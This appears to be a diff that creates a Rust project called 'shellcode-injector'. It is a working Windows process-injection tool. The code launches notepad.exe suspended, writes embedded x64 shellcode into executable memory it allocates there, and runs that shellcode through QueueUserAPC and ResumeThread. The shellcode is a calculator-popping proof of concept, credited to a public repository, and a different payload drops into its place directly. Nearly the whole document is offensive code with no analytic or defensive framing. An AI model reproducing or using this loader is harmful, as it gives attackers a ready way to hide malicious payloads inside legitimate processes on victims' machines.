sum change

.gitignore

@@ -0,0 +1 @@
+/target

Cargo.toml

@@ -0,0 +1,10 @@
+[package]
+name = "shellcode-injector"
+version = "0.1.0"
+edition = "2021"
+
+[dependencies]
+colored = "2.1.0"
+winapi = { version = "0.3.9", features = ["winbase", 
+"processthreadsapi", "handleapi", "memoryapi", 
+"errhandlingapi", "winnt", "memoryapi"] }

src/inject.rs

@@ -0,0 +1,141 @@
+use crate::utils::SHELLOCODE_LEN;
+use std::{ffi::CString, ptr};
+
+use errhandlingapi::GetLastError;
+use handleapi::CloseHandle;
+use memoryapi::{VirtualAllocEx, VirtualFree, VirtualProtectEx, WriteProcessMemory};
+use processthreadsapi::{CreateProcessA, QueueUserAPC, ResumeThread, PROCESS_INFORMATION, STARTUPINFOA};
+use winapi::{shared::minwindef::DWORD, um::*};
+use colored::{*};
+use winbase::CREATE_SUSPENDED;
+use winnt::{MEM_COMMIT, MEM_RELEASE, PAGE_EXECUTE_READWRITE, PAPCFUNC};
+
+impl crate::utils::Ushellcode {
+    pub fn new_shellcode(shellcode : [u8; SHELLOCODE_LEN]) -> Self {
+        Self {
+            shellcode
+        }
+    }
+
+    pub fn inject(&mut self) {
+
+        let p_shellcode: *const winapi::ctypes::c_void = self.shellcode.as_ptr() as *const winapi::ctypes::c_void;
+
+        let notepad_path : CString = match CString::new("C:\\Windows\\System32\\notepad.exe") {
+            Ok(n_process) => n_process,
+            Err(_) => {
+                println!("{}", "[-] An error occurred [notepad_path]".red());
+                return;
+            }
+        };
+
+        let mut si : STARTUPINFOA = unsafe { std::mem::zeroed() };
+        si.cb =   std::mem::size_of::<STARTUPINFOA>() as u32;
+
+        let mut pi : PROCESS_INFORMATION = unsafe { std::mem::zeroed() };
+
+
+        let notepad_process_suspended = unsafe {
+            CreateProcessA(
+                notepad_path.as_ptr(),
+                ptr::null_mut(),
+                ptr::null_mut(),
+                ptr::null_mut(),
+                0,
+                CREATE_SUSPENDED,
+                ptr::null_mut(),
+                ptr::null_mut(),
+                &mut si,
+                &mut pi
+            )
+        };
+
+        if notepad_process_suspended == 0 {
+            println!("{} [CreateProcessA]", "[-] An error occurred".red(),
+        );
+            return;
+        }
+
+        let pid = pi.dwProcessId;
+        println!("{}[{pid}]", "[+] Create process".green());
+
+        let v_alloc = unsafe {
+            VirtualAllocEx(
+                pi.hProcess,
+                ptr::null_mut(),
+                SHELLOCODE_LEN,
+                MEM_COMMIT,
+                PAGE_EXECUTE_READWRITE,
+            )
+        };
+
+        if v_alloc == ptr::null_mut() {
+            println!("{} {}", "[-] An error occurred [VirtualAllocEx]".red(), unsafe { GetLastError() });
+            return;
+        }
+
+        println!("{} [{:p}]", "[+] Memory allocated successfully".green(), v_alloc);
+
+        println!("{}", "[+] Write Shellcode into memory".green());
+
+        let write_alloc_mem = unsafe {
+            WriteProcessMemory(
+                pi.hProcess,
+                v_alloc,
+                p_shellcode,
+                SHELLOCODE_LEN,
+                ptr::null_mut()
+            )
+        };
+
+        if write_alloc_mem == 0 {
+            println!("{} {}", "[-] An error occurred [WriteProcessMemory]".red(), unsafe { GetLastError() });
+            return;
+        }
+
+        let mut old_protect: DWORD = 0;
+        let protect_res = unsafe {
+            VirtualProtectEx(
+                pi.hProcess,
+                v_alloc,
+                SHELLOCODE_LEN,
+                PAGE_EXECUTE_READWRITE,
+                &mut old_protect
+            )
+        };
+
+        if protect_res == 0 {
+            println!("{} {}", "[-] Failed to set memory protection".red(), unsafe { GetLastError() });
+            return;
+        }
+
+        let _apc_res = unsafe {
+            QueueUserAPC(
+                PAPCFUNC::Some(std::mem::transmute(v_alloc)),
+                pi.hThread,
+                0
+            )
+        };
+
+        println!("{} [{}]", "[+] Resume thread".green(), pid);
+        let _resume_thread = unsafe { ResumeThread(pi.hThread) };
+
+        if !v_alloc.is_null() {
+            println!("{} [v_alloc: {:p}]", "[+] Attempting to free memory".green(), v_alloc);
+            let free = unsafe { VirtualFree(v_alloc, 0, MEM_RELEASE) };
+
+            if free == 0 {
+                println!("{} {}", "[-] Failed to cleanup resource".red(), unsafe { GetLastError() });
+            } else {
+                println!("{}", "[+] Memory successfully freed".green());
+            }
+        }
+
+        unsafe {
+            CloseHandle(pi.hProcess);
+            CloseHandle(pi.hThread);
+        }
+
+
+    }
+}

src/lib.rs

@@ -0,0 +1,13 @@
+/*
+    shellcode : [u8; len]
+    ZeroMemory(STARTUPINFOA)
+    CreateProcessA -> flags(CREATE_SUSPENDED)
+    VirtualAllocEx()
+    WriteProcessMemory()
+    QueueUserAPC()
+    ResumeThread()
+    CloseHandle()
+*/
+
+pub mod utils;
+mod inject;

src/main.rs

@@ -0,0 +1,41 @@
+use shellcode_injector::utils::{*};
+fn main() {
+
+    // https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode
+
+    const SHELLCODE: [u8; SHELLOCODE_LEN] = [
+        0x48, 0x31, 0xff, 0x48, 0xf7, 0xe7, 0x65, 0x48, 
+        0x8b, 0x58, 0x60, 0x48, 0x8b, 0x5b, 0x18, 0x48, 
+        0x8b, 0x5b, 0x20, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 
+        0x1b, 0x48, 0x8b, 0x5b, 0x20, 0x49, 0x89, 0xd8, 
+        0x8b, 0x5b, 0x3c, 0x4c, 0x01, 0xc3, 0x48, 0x31, 
+        0xc9, 0x66, 0x81, 0xc1, 0xff, 0x88, 0x48, 0xc1, 
+        0xe9, 0x08, 0x8b, 0x14, 0x0b, 0x4c, 0x01, 0xc2, 
+        0x4d, 0x31, 0xd2, 0x44, 0x8b, 0x52, 0x1c, 0x4d, 
+        0x01, 0xc2, 0x4d, 0x31, 0xdb, 0x44, 0x8b, 0x5a, 
+        0x20, 0x4d, 0x01, 0xc3, 0x4d, 0x31, 0xe4, 0x44, 
+        0x8b, 0x62, 0x24, 0x4d, 0x01, 0xc4, 0xeb, 0x32, 
+        0x5b, 0x59, 0x48, 0x31, 0xc0, 0x48, 0x89, 0xe2, 
+        0x51, 0x48, 0x8b, 0x0c, 0x24, 0x48, 0x31, 0xff, 
+        0x41, 0x8b, 0x3c, 0x83, 0x4c, 0x01, 0xc7, 0x48, 
+        0x89, 0xd6, 0xf3, 0xa6, 0x74, 0x05, 0x48, 0xff, 
+        0xc0, 0xeb, 0xe6, 0x59, 0x66, 0x41, 0x8b, 0x04, 
+        0x44, 0x41, 0x8b, 0x04, 0x82, 0x4c, 0x01, 0xc0, 
+        0x53, 0xc3, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x07, 
+        0x48, 0xb8, 0x0f, 0xa8, 0x96, 0x91, 0xba, 0x87, 
+        0x9a, 0x9c, 0x48, 0xf7, 0xd0, 0x48, 0xc1, 0xe8, 
+        0x08, 0x50, 0x51, 0xe8, 0xb0, 0xff, 0xff, 0xff, 
+        0x49, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0x48, 0xf7, 
+        0xe1, 0x50, 0x48, 0xb8, 0x9c, 0x9e, 0x93, 0x9c, 
+        0xd1, 0x9a, 0x87, 0x9a, 0x48, 0xf7, 0xd0, 0x50, 
+        0x48, 0x89, 0xe1, 0x48, 0xff, 0xc2, 0x48, 0x83, 
+        0xec, 0x20, 0x41, 0xff, 0xd6,
+    ];
+
+    let mut shellcode1 : Ushellcode = Ushellcode::new_shellcode(
+        SHELLCODE
+    );
+
+    shellcode1.inject();
+
+}

src/utils.rs

@@ -0,0 +1,17 @@
+/*
+
+    unsigned char shellcode[] = "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
+				    "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
+				    "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
+				    "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
+				    "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
+				    "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
+				    "\x48\x83\xec\x20\x41\xff\xd6";
+
+	unsigned int Shellcode_len = shellcode_len;
+
+*/
+pub const SHELLOCODE_LEN : usize = 205;
+pub struct Ushellcode {
+    pub shellcode : [u8; SHELLOCODE_LEN],
+}